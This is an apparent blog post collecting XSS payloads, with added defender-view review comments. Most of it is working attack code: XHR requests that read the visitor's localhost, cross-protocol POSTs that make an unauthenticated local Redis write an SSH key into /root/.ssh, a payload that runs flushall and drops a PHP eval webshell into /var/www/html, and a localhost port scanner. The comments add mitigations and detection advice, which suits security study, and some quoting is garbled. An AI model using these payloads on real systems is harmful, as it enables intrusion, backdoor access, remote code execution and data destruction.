XSS 相关 payload 集合
Posted hac425
Ajax 获取数据
GET
/**
 * Sends an asynchronous GET to http://127.0.0.1:80/ from the page that runs this
 * script and, once a 200 response has fully arrived, assigns the response text
 * to the `innerhtml` property of the element with id "out".
 *
 * Review notes (defender view):
 * - The request is made by the visitor's browser, so 127.0.0.1 is the visitor's
 *   own machine, not the web server that served the page.
 * - Script can read `responseText` only when the page is same-origin with the
 *   target or the target answers with CORS headers that allow it; otherwise the
 *   browser withholds the body.
 * - A Content-Security-Policy `connect-src` directive on the affected site
 *   limits which hosts XMLHttpRequest may contact, and output encoding that
 *   prevents the script injection removes the precondition altogether.
 */
function loadXMLDoc()
{
var xmlhttp;
// Feature detection: native XHR where available, ActiveX fallback for legacy IE.
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function(){
// readyState 4 means the exchange is complete; only HTTP 200 is handled.
if (xmlhttp.readyState==4 && xmlhttp.status==200){
document.getElementById("out").innerhtml=xmlhttp.responseText;
}
}
// Third argument `true` makes the request asynchronous.
xmlhttp.open("GET","http://127.0.0.1:80/",true);
xmlhttp.send();
}
// Driver for loadXMLDoc(): creates an <a> element with id "out", appends it to
// the first <body> element, then starts the request. loadXMLDoc() looks the
// element up again by that id when the response arrives.
var a =document.createElement("a");
a.id = "out";
// `bd` is assigned without var/let/const, so it becomes an implicit global.
bd = document.getElementsByTagName("body")[0];
bd.appendChild(a);
loadXMLDoc();
POST 写 redis(前提:受害者浏览器所在主机的 Redis 监听 127.0.0.1:6379 且未启用认证)
写 ssh 公钥
// Cross-protocol request from a browser to a local Redis instance: two XHR POSTs
// to http://127.0.0.1:6379 whose bodies carry Redis commands. The first body
// stores a key containing an SSH public-key line and points the Redis `dir` and
// `dbfilename` settings at <keydir>/authorized_keys; the second sends `save`.
//
// NOTE(review): the text is kept verbatim from the page; the extraction has
// altered the string quoting and split literals across lines.
//
// Review notes (defender view):
// - Nothing here authenticates to Redis, so `requirepass` or ACLs, together with
//   `protected-mode` and a narrow `bind`, stop the commands from being accepted.
// - Redis 3.2.7 and later close a connection whose input starts with "POST" or
//   "Host:", which is aimed at exactly this kind of browser-originated request;
//   confirm the deployed version.
// - Run Redis as an unprivileged user with no write access to any ~/.ssh
//   directory, and consider `rename-command CONFIG ""` where runtime
//   reconfiguration is not needed.
// - Detection: alert on CONFIG SET of `dir` or `dbfilename`, and put
//   authorized_keys files under file-integrity monitoring.
var keydir = "/root/.ssh";
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send(‘eval ‘‘ + ‘redis.call("set", "hacked", "\r\n\nssh-rsa AAAAB... [email protected]\n\n\n\n"); redis.call("config", "set", "dir", "‘ + keydir + ‘/"); redis.call("config", "set", "dbfilename", "authorized_keys"); ‘ + ‘‘ 0‘ + "
");
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send(‘save
‘);
写 php webshell
<!--
  Review notes (defender view). The script below builds a FormData body holding
  Redis commands (flushall, config set dir /var/www/html/, config set dbfilename
  shell.php, a key whose value is PHP that evaluates a GET parameter, save, quit)
  and POSTs it to http://127.0.0.1:6379 from the visitor's browser.
  Impact if accepted by Redis: all keys are erased by flushall and the dump file
  is written into the web root under a .php name.
  Mitigations: require Redis authentication (requirepass or ACLs) with
  protected-mode and a narrow bind; run Redis under an account that cannot write
  to the web root; do not let the web server execute files it did not deploy;
  a Content-Security-Policy connect-src directive on the injectable site limits
  where XHR may connect.
  Detection: alert on CONFIG SET of dir or dbfilename, on FLUSHALL outside
  maintenance windows, and on new .php files appearing in the web root.
  NOTE(review): text kept verbatim from the page; the extraction has altered
  quoting and spacing in several places.
-->
<a id="flag">pwn</ a>
level=low_273eac1c
<script>
var xmlHttp;
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}
else{
xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
}
var formData = new FormData();
formData.append("0","flushall"+"
"+"config set dir /var/www/html/"+"
"+"config set dbfilename shell.php"+"
"+‘set 1 "\n\n<?php header(‘Access-Control-Allow-Origin:*‘);eval($_GET[_]);?>\n\n"‘+"
"+"save"+"
"+"quit");
xmlHttp.open("POST","http://127.0.0.1:6379",true);
xmlHttp.send(formData);
</script>
来源
https://xz.aliyun.com/t/2607#toc-2
https://strcpy.me/index.php/archives/751/
端口扫描
payload
// For each port in `ports`, appends a <script> element to <body> whose src is
// http://127.0.0.1:<port> and whose onload attribute holds code that logs
// "<port> OPEN; " to the console. The load event is used as a signal that
// something on the visitor's own machine answered on that port.
//
// NOTE(review): text kept verbatim from the page; the extraction has altered
// the quoting on the `poc` line.
//
// Review notes (defender view):
// - A Content-Security-Policy `script-src` that does not list loopback origins
//   blocks these loads on the injectable site, and `report-uri` / `report-to`
//   violation reports naming 127.0.0.1 with varying ports are a usable
//   detection signal for this behaviour.
// - Browser restrictions on public-to-private network requests may also
//   interfere, depending on browser and version; do not rely on them alone.
// - The root cause is the script injection itself; output encoding and input
//   handling on the vulnerable page remove the foothold.
var TagName = document.getElementsByTagName("body")[0];
// `ports` is assigned without a declaration, so it becomes an implicit global.
ports=[443,80,81,88,6379,8000,8080,8088];
// for...in over an array yields index strings; ports[i] is the port number.
for(var i in ports){
var script = document.createElement("script");
poc = "var data = ‘" + ports[i] + " OPEN; ‘; console.log(data);"
script.setAttribute("src","http://127.0.0.1:" + ports[i]);
script.setAttribute("onload", poc);
TagName.appendChild(script);
}
来源
https://xz.aliyun.com/t/2607#toc-2